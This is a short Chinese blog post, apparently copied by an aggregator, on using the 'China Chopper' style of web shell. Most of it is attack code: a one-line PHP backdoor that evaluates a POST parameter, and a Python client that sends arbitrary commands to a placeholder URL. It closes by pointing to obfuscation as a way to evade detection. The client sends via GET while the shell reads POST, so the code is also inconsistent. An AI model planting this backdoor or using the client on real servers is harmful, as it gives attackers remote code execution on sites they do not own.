关于中国菜刀,如何"切菜"
Posted 烤红薯咖啡馆
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了关于中国菜刀,如何"切菜"相关的知识,希望对你有一定的参考价值。
0x00 菜
关于一句话木马肯定是眼熟能详,一句话木马如下:
<?php eval($_POST[w]);?>
0x01 刀
一把西瓜刀如下:
# -*-coding=utf-8-*-
# /usr/bin/python
import sys
import requests
def encodePayload(payload):
#请尽情蹂躏payload
return str(payload)
cmd = sys.argv[1]
payload = encodePayload(cmd)
url = "www.xxx.com/1.php?w="+ payload
req = requests.get(url)
print req.text
本质上算是代码注入。
0x02 如果进行绕过呢?
需要人员在满足编程语法规则上,尽情蹂躏代码。举个栗子:编码转换、字符串拼接、特殊符号等等。
博主正在想栗子...
以上是关于关于中国菜刀,如何"切菜"的主要内容,如果未能解决你的问题,请参考以下文章